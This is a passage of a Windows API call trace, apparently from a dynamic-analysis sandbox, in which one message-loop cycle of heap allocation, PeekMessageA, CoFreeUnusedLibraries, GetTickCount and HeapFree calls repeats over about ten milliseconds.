(HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.566] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.566] CoFreeUnusedLibraries () [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.566] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.566] CoFreeUnusedLibraries () [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.566] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.566] CoFreeUnusedLibraries () [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.566] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.567] CoFreeUnusedLibraries () [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.567] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.567] CoFreeUnusedLibraries () [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.567] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.567] CoFreeUnusedLibraries () [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.567] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.567] CoFreeUnusedLibraries () [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.567] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.567] CoFreeUnusedLibraries () [0066.567] GetTickCount () returned 0x1d2b9 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.567] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.568] GetTickCount () returned 0x1d2b9 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.568] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.568] CoFreeUnusedLibraries () [0066.568] GetTickCount () returned 0x1d2b9 [0066.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.568] GetTickCount () returned 0x1d2b9 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.568] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.568] CoFreeUnusedLibraries () [0066.568] GetTickCount () returned 0x1d2b9 [0066.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.568] GetTickCount () returned 0x1d2b9 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.568] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.568] CoFreeUnusedLibraries () [0066.568] GetTickCount () returned 0x1d2b9 [0066.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.568] GetTickCount () returned 0x1d2b9 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.568] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.568] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.568] CoFreeUnusedLibraries () [0066.568] GetTickCount () returned 0x1d2b9 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.569] GetTickCount () returned 0x1d2b9 [0066.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.569] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.569] CoFreeUnusedLibraries () [0066.569] GetTickCount () returned 0x1d2b9 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.569] GetTickCount () returned 0x1d2b9 [0066.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.569] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.569] CoFreeUnusedLibraries () [0066.569] GetTickCount () returned 0x1d2b9 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.569] GetTickCount () returned 0x1d2b9 [0066.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.569] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.569] CoFreeUnusedLibraries () [0066.569] GetTickCount () returned 0x1d2b9 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.569] GetTickCount () returned 0x1d2b9 [0066.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.570] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.570] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.570] CoFreeUnusedLibraries () [0066.570] GetTickCount () returned 0x1d2b9 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.570] GetTickCount () returned 0x1d2b9 [0066.570] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.570] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.570] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.570] CoFreeUnusedLibraries () [0066.570] GetTickCount () returned 0x1d2b9 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.570] GetTickCount () returned 0x1d2b9 [0066.570] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.570] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.570] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.570] CoFreeUnusedLibraries () [0066.570] GetTickCount () returned 0x1d2b9 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.570] GetTickCount () returned 0x1d2b9 [0066.570] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.570] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.570] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.570] CoFreeUnusedLibraries () [0066.570] GetTickCount () returned 0x1d2b9 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.570] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.571] GetTickCount () returned 0x1d2b9 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.571] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.571] CoFreeUnusedLibraries () [0066.571] GetTickCount () returned 0x1d2b9 [0066.571] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.571] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.571] GetTickCount () returned 0x1d2b9 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.571] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.571] CoFreeUnusedLibraries () [0066.571] GetTickCount () returned 0x1d2b9 [0066.571] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.571] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.571] GetTickCount () returned 0x1d2b9 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.571] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.571] CoFreeUnusedLibraries () [0066.571] GetTickCount () returned 0x1d2b9 [0066.571] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.571] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.571] GetTickCount () returned 0x1d2b9 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.571] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.572] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.572] CoFreeUnusedLibraries () [0066.572] GetTickCount () returned 0x1d2b9 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.572] GetTickCount () returned 0x1d2b9 [0066.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.572] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.572] CoFreeUnusedLibraries () [0066.572] GetTickCount () returned 0x1d2b9 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.572] GetTickCount () returned 0x1d2b9 [0066.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.572] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.572] CoFreeUnusedLibraries () [0066.572] GetTickCount () returned 0x1d2b9 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.572] GetTickCount () returned 0x1d2b9 [0066.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.572] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.572] CoFreeUnusedLibraries () [0066.572] GetTickCount () returned 0x1d2b9 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.573] GetTickCount () returned 0x1d2b9 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.573] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.573] CoFreeUnusedLibraries () [0066.573] GetTickCount () returned 0x1d2b9 [0066.573] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.573] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.573] GetTickCount () returned 0x1d2b9 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.573] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.573] CoFreeUnusedLibraries () [0066.573] GetTickCount () returned 0x1d2b9 [0066.573] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.573] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.573] GetTickCount () returned 0x1d2b9 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.573] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.573] CoFreeUnusedLibraries () [0066.573] GetTickCount () returned 0x1d2b9 [0066.573] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.573] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.573] GetTickCount () returned 0x1d2b9 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.573] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.573] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.574] CoFreeUnusedLibraries () [0066.574] GetTickCount () returned 0x1d2b9 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.574] GetTickCount () returned 0x1d2b9 [0066.574] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.574] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.574] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.574] CoFreeUnusedLibraries () [0066.574] GetTickCount () returned 0x1d2b9 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.574] GetTickCount () returned 0x1d2b9 [0066.574] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.574] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.574] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.574] CoFreeUnusedLibraries () [0066.574] GetTickCount () returned 0x1d2b9 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.574] GetTickCount () returned 0x1d2b9 [0066.574] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.574] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.574] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.574] CoFreeUnusedLibraries () [0066.574] GetTickCount () returned 0x1d2b9 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.574] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.574] GetTickCount () returned 0x1d2b9 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.575] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.575] CoFreeUnusedLibraries () [0066.575] GetTickCount () returned 0x1d2b9 [0066.575] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.575] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.575] GetTickCount () returned 0x1d2b9 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.575] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.575] CoFreeUnusedLibraries () [0066.575] GetTickCount () returned 0x1d2b9 [0066.575] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.575] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.575] GetTickCount () returned 0x1d2b9 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.575] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.575] CoFreeUnusedLibraries () [0066.575] GetTickCount () returned 0x1d2b9 [0066.575] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.575] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.575] GetTickCount () returned 0x1d2b9 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.575] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.575] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.576] CoFreeUnusedLibraries () [0066.576] GetTickCount () returned 0x1d2b9 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.576] GetTickCount () returned 0x1d2b9 [0066.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 